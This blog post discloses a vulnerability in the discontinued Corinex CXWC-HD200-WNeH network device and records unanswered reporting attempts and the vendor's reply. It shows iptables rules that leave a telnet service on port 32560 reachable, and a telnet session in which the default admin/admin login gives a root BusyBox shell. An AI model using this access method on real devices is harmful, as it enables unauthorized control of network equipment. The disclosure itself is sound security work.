I found a vulnerability in the Corinex CXWC-HD200-WNeH and I tried to report it / 2022-10-31

2022-10-31 I found a vulnerability in the Corinex CXWC-HD200-WNeH and I tried to report it
Somewhere between the digging in the Corinex CXWC-HD200-WNeH I found a vulnerability. A combination of a misconfigured network filter and a default account make it quite easy to get into the device and get full access.

I tried to report this vulnerability before publishing about it. Timeline:
  • 24 September 2022 I mailed a general address at Corinex about this
  • 29 September 2022 I mailed someone who wrote about Corinex devices in the Netherlands
  • 28 October 2022 I tried to contact @CorinexCorp on twitter via a mention
All this got exactly zero response.

Update 2022-11-17: @CorinexCorp responded on twitter: Hi Koos. Apologies for a lack of response. Corinex no longer supports CXWC-HD200-WNeH devices. The company exited the consumer market many years ago.

Because this device is out-of-support for years now and should not be in use anywhere anymore, I think I've invested enough effort in trying to report this vulnerability to the right people and I can now publish this and close this chapter.

On to the actual vulnerability. Like a lot of other vulnerabilities this is a case of multiple things coming together.

The misconfigured network filter

The CXWC-HD200-WNeH is running a telnet server on port 32560. Attempts have been made to filter this telnet server so it can't be reached, as this port isn't allowed per the DEFAULT_INP filter, referenced from the standard INPUT filter. But since there is no DROP/REJECT rule or policy for this traffic this failes. Maybe the filtering on traffic not via the bridge should be doing this, but in bridged mode this isn't working.
# iptables -L INPUT -n -v
Chain INPUT (policy ACCEPT 19 packets, 9912 bytes)
 pkts bytes target     prot opt in     out     source               destination         
 3414  280K            all  --  *      *       0.0.0.0/0            0.0.0.0/0           
 3414  280K            all  --  *      *       0.0.0.0/0            0.0.0.0/0           
 3414  280K ISAP_INP   all  --  *      *       0.0.0.0/0            0.0.0.0/0           
 3414  280K DEFAULT_INP  all  --  *      *       0.0.0.0/0            0.0.0.0/0           

# iptables -L ISAP_INP -n -v
Chain ISAP_INP (1 references)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 ACCEPT     udp  --  *      *       0.0.0.0/0            0.0.0.0/0           udp dpt:161
    0     0 ACCEPT     2    --  *      *       0.0.0.0/0            0.0.0.0/0           
# iptables -L DEFAULT_INP -n -v
Chain DEFAULT_INP (1 references)
 pkts bytes target     prot opt in     out     source               destination         
 3284  260K ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
  223 13380 ACCEPT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:80 
   36  4320 ACCEPT     icmp --  *      *       0.0.0.0/0            0.0.0.0/0           
    0     0 DROP       all  --  !br0   *       0.0.0.0/0            0.0.0.0/0           

The default account

One of the things I type when confronted with a login prompt on a device under test is username 'admin' and password 'admin'. This works on this device.
$ telnet 10.10.1.253 32560
Trying 10.10.1.253...
Connected to 10.10.1.253.
Escape character is '^]'.

login: admin
Password: 



BusyBox v1.12.1 (2012-08-22 10:19:32 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# 

Conclusion

These two things together cause a vulnerable situation: in a holiday park you don't want the visitors to get full access to the configuration of the network router.

Tags: , ,

IPv6 check

Running test...
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

RSS
Meningen zijn die van mezelf, wat ik schrijf is beschermd door auteursrecht. Sommige publicaties bevatten een expliciete vermelding dat ze ongevraagd gedeeld mogen worden.
My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: newsitem.cgi,v 1.57 2022/02/15 21:48:18 koos Exp $ in 0.010988 seconds.